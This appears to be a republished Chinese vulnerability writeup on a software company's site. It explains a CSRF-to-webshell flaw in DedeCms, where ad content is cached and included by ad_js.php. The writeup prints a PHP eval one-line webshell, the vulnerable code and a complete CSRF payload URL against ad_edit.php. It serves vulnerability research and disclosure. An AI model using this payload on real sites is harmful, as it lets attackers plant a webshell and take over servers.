当前位置 : 首页 > 徐州网络安全技术论坛 > 我是如何利用CSRF Get DedeCms Shell的

我是如何利用CSRF Get DedeCms Shell的

作者:徐州软件公司  文章来源:徐州软件公司   阅读次数:151 次
2017-12-27

此文章是徐州软件公司整理的技术资料,由徐州软件公司总务部发布,邮箱:zongwu@xuzhousoft.com

江苏徐软信息科技有限公司江苏徐软信息科技有限公司

说实话,有一两个月没有审计大厂了,然后随便看到群里有人问dede最新有没有漏洞,就下了一套最新的dede,结果我一看还真发现了。 

csrf-bear.jpg

我们发现后台添加广告的地方存在跨站请求伪造漏洞。远程攻击者可通过提交特制的请求利用达到写入WebShell目的。

在添加广告的地方,广告内容你直接写就可以了

<?php eval($  _POST[An])?>

这段代码会直接存到数据库里,然后我们从另一个地方利用这个写进数据库的一句话木马,也是这次漏洞的核心利用文件。

/Plus/ad_js.php

问题代码出现在19-44行,具体来看代码

if( isset($  nocache) || !file_exists($  cacheFile) || time() - filemtime($  cacheFile) > $  cfg_puccache_time )

{

    $  row = $  dsql->GetOne("SELECT * FROM `#@__myad` WHERE aid='$  aid' ");

    $  adbody = '';

    if($  row['timeset']==0)

    {

        $  adbody = $  row['normbody'];

    }

    else

    {

        $  ntime = time();

        if($  ntime > $  row['endtime'] || $  ntime < $  row['starttime']) {

            $  adbody = $  row['expbody'];

        } else {

            $  adbody = $  row['normbody'];

        }

    }

    $  adbody = str_replace('"', '\"',$  adbody);

    $  adbody = str_replace("\r", "\r",$  adbody);

    $  adbody = str_replace("\n", "\n",$  adbody);

    $  adbody = "<!--\r\ndocument.write(\"{$  adbody}\");\r\n-->\r\n";

    $  fp = fopen($  cacheFile, 'w');

    fwrite($  fp, $  adbody);

    fclose($  fp);

}

include $  cacheFile;

然后徐州网络信息安全公司徐州徐软信息科技有限公司注重去分析这几行代码是如何出现问题的。

首先,用用If语句来判断 是否设置了nocache变量  然后再判断$ cacheFile文件是否存在,但是因为是或判断,我们只需要用默认的变量注册注册一个nocache变量即可进入此判断。在If语句内,第一个就是一个SELECT查询语句,我们只可以控制$ aid,但是因为前面的三目运算符限制了$ aid的值,所以说我们就老老实实的让他查询,这里查询的是存放广告的表,然后初始化$ abody的值为空,防止变量注册来写入恶意代码。

再往后走又是一个If语句,这个If语句是判断是不是广告无限时间,如果是直接把$ abody赋值成数据库中normbody字段的值,如果广告时间不是无限的话,就用现在的时间和设置的过期时间进行判断,如果过期了,就输出存入过期的值,如果不过期,就输出存入的值。

之后再下面,对$ abody进行了过滤,只是过滤了\r \n 和” ,然后打开$ cacheFile文件,并写入$ abody变量,然后关闭文件,并在下方包含了这个文件,导致了漏洞的产生。所以说只要我们控制了广告的代码,就可以造GetShell,但是这是后台功能,所以说我们在没有注入的情况下,只能通过Csrf来诱导管理员来点击我们设置好的页面,来让管理员修改广告代码,或者通过一个前台SQL注入漏洞,来修改这个表的字段来模拟后台管理员修改此字段,也可以达到GetShell的目的。

#总结

不得不说Dede做安全还是做得挺好的,参数全部转Int了无法注入,这里我们可以看到一个SQL语句,这是查询广告Id的,如果有就赋值内容给$ row变量 让然后过滤\r \n和双引号来写入模板页,并在下方直接Include包含了这个模板页,虽然这个模板页是html后缀,但是包含了可以直接执行PHP代码的!所以导致了GetShell的产生。

PayLoad:http://localhost/dede/dede/ad_edit.php?aid=1&dopost=saveedit&clsid=0&typeid=0&adname=aaaaaaaa&timeset=0&starttime=2017-12-06 03:04:28&endtime=2018-01-05 03:04:28&normbody=<?php eval($  _POST[密码])?>&expbody=aaaaaa&imageField.x=22&imageField.y=16

图片1.png图片2.png

江苏徐软信息科技有限公司(简称徐州软件公司)是徐州软件公司中成立时间最长、技术能力最强、经济实力最雄厚的徐州软件开发公司之一,专业的徐州软件开发团队,从事徐州软件开发10年,一直保持着徐州软件开发行业排头兵的地位。徐州软件公司徐州软件开发行业内的众多徐州软件开发公司保持着良好的合作关系,是徐州软件开发行业的领航者之一。徐州软件公司立足徐州软件开发市场,主攻徐州软件开发徐州APP开发徐州软件公司徐州ERP软件开发徐州OA软件开发徐州CRM软件开发等领域拥有大量经典案例。更多信息请访问徐州软件公司官方网站:

徐软com:http://www.xuzhousoft.com  徐软cn:http://www.xuzhousoft.com.cn
徐软app:http://app.xuzhousoft.com  淮北徐软:http://huaibei.xuzhousoft.com.cn
济宁徐软:http://jining.xuzhousoft.com.cn  亳州徐软:http://bozhou.xuzhousoft.com.cn
菏泽徐软:http://heze.xuzhousoft.com.cn  宿州徐软:http://suzhou.xuzhousoft.com.cn
枣庄徐软:http://zaozhuang.xuzhousoft.com.cn  宿迁徐软:http://suqian.xuzhousoft.com.cn
商丘徐软:http://shangqiu.xuzhousoft.com.cn  连云港徐软:http://lianyungang.xuzhousoft.com.cn
莱芜徐软:http://laiwu.xuzhousoft.com.cn  泰安徐软:http://taian.xuzhousoft.com.cn
日照徐软:http://rizhao.xuzhousoft.com.cn  开封徐软:http://kaifeng.xuzhousoft.com.cn
周口徐软:http://zhoukou.xuzhousoft.com.cn  盐城徐软:http://yancheng.xuzhousoft.com.cn
淮安徐软:http://huaian.xuzhousoft.com.cn  阜阳徐软:http://fuyang.xuzhousoft.com.cn
蚌埠徐软:http://bengbu.xuzhousoft.com.cn  临沂徐软:http://linyi.xuzhousoft.com.cn
邳州徐软:http://pizhou.xuzhousoft.com.cn  新沂徐软:http://xinyi.xuzhousoft.com.cn
沛县徐软:http://peixian.xuzhousoft.com.cn  睢宁徐软:http://suining.xuzhousoft.com.cn
丰县徐软:http://fengxian.xuzhousoft.com.cn  萧县徐软:http://xiaoxian.xuzhousoft.com.cn
砀山徐软:http://dangshan.xuzhousoft.com.cn  微山徐软:http://weishan.xuzhousoft.com.cn
永城徐软:http://yongcheng.xuzhousoft.com.cn  网络营销:http://www.f168yingxiao.com
徐州系统集成公司:http://www.0516app.com

关键字标签:徐州软件公司 徐州软件开发公司 徐州APP软件开发公司 徐州ERP软件开发公司 徐州CRM软件开发公司 徐州OA软件开发公司

下载DOC版 下载PDF版

* 以上内容由 徐州软件公司 整理


关于我们

    江苏徐软信息科技有限公司(简称徐州软件)位于国家大学科技园内,成立于2005年,注册资金1000万元,是徐州地区最具实力的集软件开发、电子商务技术服务、门户网站建设、系统集成、网络工程为一体的高科技IT技术公司之一。

技术支持

  • 售后服务电话:0516-83003411
  • 售后服务QQ:412110939
  • 售后服务邮箱:
    service@xuzhousoft.com
  • 售后投诉电话:18795428064
徐州软件公司
    扫描微信二维码即可获得
    免费信息化咨询服务

Copyright© 2005 江苏徐软信息科技有限公司 All Rights Reserved.
苏公网安备 32030302000144号  苏ICP备11059116号-5

地址:江苏省徐州市云龙区和平路57号江苏师范大学科技园4F  徐州软件公司
电话:0516-83737996 邮箱:sales@xuzhousoft.com

江苏徐软信息科技有限公司地图
江苏徐软信息科技有限公司地图
点这里关闭本窗口
×